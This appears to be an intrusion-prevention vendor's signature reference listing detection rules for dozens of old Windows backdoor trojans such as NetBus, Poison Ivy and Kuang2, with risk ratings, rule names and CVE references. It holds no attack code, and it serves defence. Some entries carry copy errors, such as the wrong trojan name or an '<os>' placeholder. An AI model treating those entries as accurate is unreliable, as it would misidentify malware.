https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-GateCrasher

About this vulnerability: Backdoor GateCrasher activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: GateCrasher
Type: Backdoor
Description: GateCrasher backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_GateCrasher-Response
Back to top

Backdoor-Ghost

About this vulnerability: Backdoor Ghost activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ghost
Type: Backdoor
Description: Ghost is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Ghost-Response
Back to top

Backdoor-Gift-Latinus-Pest

About this vulnerability: Backdoor Gift/Latinus/Pest activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Gift-Latinus-Pest
Type: Backdoor
Description: Gift/Latinus/Pest is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Gift-Latinus-Pest-Response
Back to top

Backdoor-GirlFriend

About this vulnerability: GirlFriend backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: GirlFriend
Type: Backdoor
Description: GirlFriend backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_GirlFriend-Response
Back to top

Backdoor-Glacier

About this vulnerability: Glacier backdoor
Risk: High
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Glacier is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Glacier
BD-TCP_Konik
BD-TCP_Remote-Explorer
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Gspot

About this vulnerability: Backdoor Gspot activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Gspot
Type: Backdoor
Description: Gspot is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Gspot-Response
Back to top

Backdoor-Hack-A-Tack

About this vulnerability: Hack-a-tack backdoor
Risk: High
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Hack-a-tack is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Hack-A-Tack
BD-TCP_Hackers-World
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Hellz-Addiction

About this vulnerability: Backdoor Hellz Addiction activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Hellz Addiction
Type: Backdoor
Description: Hellz Addiction is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Hellz-Addiction-Response
Back to top

Backdoor-Host-Control

About this vulnerability: Backdoor Host Control activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 98; Windows 95
Software: Host Control
Type: Backdoor
Description: Host Control backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_Host-Control-Response
Back to top

Backdoor-InCommand

About this vulnerability: Backdoor InCommand activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: InCommand
Type: Backdoor
Description: InCommand is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_InCommand-Response
Back to top

Backdoor-Infector

About this vulnerability: Backdoor Infector activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Infector
Type: Backdoor
Description: Infector backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_Infector-Response
Back to top

Backdoor-Insane-Network

About this vulnerability: Backdoor Insane Network activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Insane Network
Type: Backdoor
Description: Insane Network is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system.
Situation: BD-TCP_Insane-Network-Response
Back to top

Backdoor-Intruzzo

About this vulnerability: Intruzzo backdoor
Risk: High
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Intruzzo is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Intruzzo
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Kid-Terror

About this vulnerability: Backdoor Kid Terror activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Kid Terror
Type: Backdoor
Description: Kid Terror is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Kid-Terror-Response
Back to top

Backdoor-Kuang2-Virus

About this vulnerability: Backdoor Kuang2 Virus activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98
Software: Kuang2
Type: Backdoor
Description: Kuang2 Virus backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_Kuang2-Virus-Response
Back to top

Backdoor-Last2000

About this vulnerability: Last2000 backdoor
Risk: High
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Last2000 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Last2000
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Leszcz

About this vulnerability: Backdoor Leszcz activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Leszcz
Type: Backdoor
Description: Leszcz backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_Leszcz-Response
Back to top

Backdoor-Lithium

About this vulnerability: Lithium backdoor
Risk: High
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Lithium is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Lithium
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-M2-Trojan

About this vulnerability: Backdoor M2 Trojan activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: M2 Trojan
Type: Backdoor
Description: M2 Trojan is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_M2-Trojan-Response
Back to top

Backdoor-Mantis

About this vulnerability: Backdoor Mantis activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mantis
Type: Backdoor
Description: Mantis backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_Mantis-Response
Back to top

Backdoor-Massaker

About this vulnerability: Backdoor Massaker activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Massaker
Type: Backdoor
Description: Massaker is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Massaker-Response
Back to top

Backdoor-Masters-Of-Paradise

About this vulnerability: Masters Of Paradise backdoor
Risk: High
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Masters of paradise is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Masters-Of-Paradise
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Mavericks-Matrix

About this vulnerability: Backdoor Maverick's Matrix activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98
Software: Mavericks Matrix
Type: Backdoor
Description: Maverick's Matrix backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_Mavericks-Matrix-Response
Back to top

Backdoor-Meet-The-Lamer

About this vulnerability: Meet-The-Lamer backdoor
Risk: High
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Meet The Lamer is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Meet-The-Lamer
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Michal

About this vulnerability: Backdoor Michal activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Michal
Type: Backdoor
Description: Michal is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Michal-Response
Back to top

Backdoor-Microspy

About this vulnerability: Microspy backdoor
Risk: High
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Microspy is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Microspy
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Millenium

About this vulnerability: Backdoor Millenium activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Millenium
Type: Backdoor
Description: Millenium backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_Millenium-Response
Back to top

Backdoor-Mini-Oblivion

About this vulnerability: Backdoor Mini Oblivion activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mini Oblivion
Type: Backdoor
Description: Mini Oblivion is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Mini-Oblivion-Response
Back to top

Backdoor-Mneah

About this vulnerability: Mneah backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mneah
Type: Backdoor
Description: Mneah is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Mneah-Response
Back to top

Backdoor-Moonpie

About this vulnerability: Backdoor Moonpie activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Moonpie
Type: Backdoor
Description: Moonpie is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Moonpie-Response
Back to top

Backdoor-Mosucker

About this vulnerability: Backdoor Mosucker activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98
Software: Mosucker
Type: Backdoor
Description: Mosucker is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Mosucker-Response
Back to top

Backdoor-Net-Administrator

About this vulnerability: Net Administrator backdoor
Risk: High
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: NoSecure is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Net-Administrator
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Net-Devil

About this vulnerability: Backdoor Net-Devil activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Net-Devil
Type: Backdoor
Description: Net-Devil is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Net-Devil-Response
Back to top

Backdoor-Net-Metropolitan

About this vulnerability: Net Metropolitan backdoor
Risk: High
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Net Metropolitan is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Net-Metropolitan
BD-TCP_Net-Metropolitan-Reply
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Net-Taxi

About this vulnerability: Net Taxi backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Net Taxi
Type: Backdoor
Description: Net Taxi is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Net-Taxi-Response
Back to top

Backdoor-NetBus

About this vulnerability: Backdoor NetBus activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: NetBus
Type: Backdoor
Description: NetBus is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_NetBus-Response
Back to top

Backdoor-NetBus-Pro

About this vulnerability: Backdoor NetBus Pro activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: NetBus
Type: Backdoor
Description: NetBus Pro backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_NetBus-Pro-Request
BD-TCP_NetBus-Pro-Response
Back to top

Backdoor-Netcontroller

About this vulnerability: Netcontroller backdoor
Risk: High
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Netcontroller is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Netcontroller
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Netraider

About this vulnerability: Backdoor Netraider activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Netraider
Type: Backdoor
Description: Netraider is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Netraider-Response
Back to top

Backdoor-NetSphere

About this vulnerability: Backdoor NetSphere activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98; Windows NT
Software: NetSphere
Type: Backdoor
Description: NetSphere backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_NetSphere-Response
Back to top

Backdoor-NetSpy

About this vulnerability: Backdoor NetSpy activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98
Software: NetSpy
Type: Backdoor
Description: NetSpy backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_NetSpy-Response
Back to top

Backdoor-Network-Terrorist

About this vulnerability: Backdoor Network Terrorist activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Network Terrorist
Type: Backdoor
Description: Network Terrorist is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Network-Terrorist-Response
Back to top

Backdoor-New-Silencer

About this vulnerability: New Silencer backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: New Silencer
Type: Backdoor
Description: New Silencer is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_New-Silencer-Response
Back to top

Backdoor-Nirvana

About this vulnerability: Nirvana backdoor
Risk: High
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: NoSecure is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Nirvana
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-NokNok

About this vulnerability: NokNok backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: NokNok
Type: Backdoor
Description: NokNok is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_NokNok-Response
Back to top

Backdoor-NoSecure

About this vulnerability: NoSecure backdoor
Risk: High
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: NoSecure is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_NoSecure
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Oblivion

About this vulnerability: Backdoor Oblivion activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Oblivion
Type: Backdoor
Description: Oblivion is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Oblivion-Response
Back to top

Backdoor-Olive

About this vulnerability: Pitfall Surprise backdoor
Risk: High
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Olive is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Olive-Response
BD-TCP_Oiris-Banner
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-One

About this vulnerability: Backdoor One activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: One is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_One-Response
Back to top

Backdoor-OOTLT

About this vulnerability: OOTLT backdoor
Risk: High
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: OOTLT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_PC-OOTLT
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Optix-Pro

About this vulnerability: Backdoor Optix Pro activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Optix-Pro
Type: Backdoor
Description: Optix Pro is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Optix-Pro-Response
Back to top

Backdoor-Oxon

About this vulnerability: Oxon backdoor
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Oxon is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_PC-Oxon
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-PC-Invader

About this vulnerability: PC Invader backdoor
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: PC Invader is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_PC-Invader
BD-TCP_PC-Invader-Banner
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Phase-Zero

About this vulnerability: Backdoor Phase Zero activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98; Windows NT
Software: Phase Zero
Type: Backdoor
Description: Phase Zero backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_Phase-Zero-Response
Back to top

Backdoor-Phoenix

About this vulnerability: Phoenix backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Phoenix
Type: Backdoor
Description: Phoenix backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_Phoenix-Response
Back to top

Backdoor-PitFall

About this vulnerability: PitFall backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PitFall
Type: Backdoor
Description: PitFall backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_PitFall-Response
Back to top

Backdoor-Pitfall-Surprise

About this vulnerability: Pitfall Surprise backdoor
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Pitfall Surprise is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Pitfall-Surprise
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Poison-Ivy

About this vulnerability: Poison Ivy backdoor
Risk: High
First detected in: sgpkg-ips-305-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Poison Ivy is a Trojan Horse program, which can be used to bypass normal security mechanisms to secretly control and steal data from an infected computer. Infected computers are subject to a variety of remote control functionality, ranging from remote administration to surveillance.
Situation: Shared_SS-Poison-Ivy-Traffic
Datalength-TCP_Poison-Ivy-Traffic
Back to top

Backdoor-Priority

About this vulnerability: Priority backdoor
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Priority is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Priority
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Private-Port

About this vulnerability: Private Port backdoor
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Private Port is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Private-Port
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Progenic

About this vulnerability: Progenic backdoor
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Progenic is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Progenic
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Project-Next

About this vulnerability: Project nEXT backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Project nEXT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Project-Next-Response
Back to top

Backdoor-Prosiak

About this vulnerability: Prosiak backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Prosiak
Type: Backdoor
Description: Prosiak backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_Prosiak-Response
Back to top

Backdoor-PsychWard

About this vulnerability: PsychWard backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PsychWard
Type: Backdoor
Description: PsychWard is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_PsychWard-Response
Back to top

Backdoor-Qwertos-RAT

About this vulnerability: Qwertos Rat backdoor
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Qwertos RAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Qwertos-RAT
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-R0Xr4t

About this vulnerability: R0Xr4t backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: R0Xr4t
Type: Backdoor
Description: R0Xr4t is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_R0Xr4t-Response
Back to top

Backdoor-R3CServer

About this vulnerability: R3CServer backdoor
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: R3CServer is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_R3CServer
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-RaTHeaD

About this vulnerability: RaTHeaD backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RaTHeaD
Type: Backdoor
Description: RaTHeaD backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_RaTHeaD-Response
Back to top

Backdoor-Remote-Boot-Tool

About this vulnerability: Remote Boot Tool backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Remote Boot Tool
Type: Backdoor
Description: Remote Boot Tool backdoor allows a remote attacker to control the infected system.
Situation: BD-UDP_Remote-Boot-Tool-Response
Back to top

Backdoor-Remote-Hack

About this vulnerability: Remote Hack backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Remote Hack
Type: Backdoor
Description: Remote Hack is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Remote-Hack
BD-TCP_Remote-Hack-Response
Back to top

Backdoor-Remote-Process-Monitor

About this vulnerability: Remote Process Monitor backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Remote Process Monitor
Type: Backdoor
Description: Remote Process Monitor backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_Remote-Process-Monitor-Response
Back to top

Backdoor-Remote-Revise

About this vulnerability: Remote Revise backdoor
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Remote Revise is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Remote-Revise
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Revenger

About this vulnerability: Revenger backdoor activity
Risk: High
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Revenger
Type: Backdoor
Description: Revenger is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-UDP_Revenger-Response
Back to top

Backdoor-Ripperz-Controller

About this vulnerability: Ripperz Controller backdoor
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Ripperz Controller is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Ripperz-Controller
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top
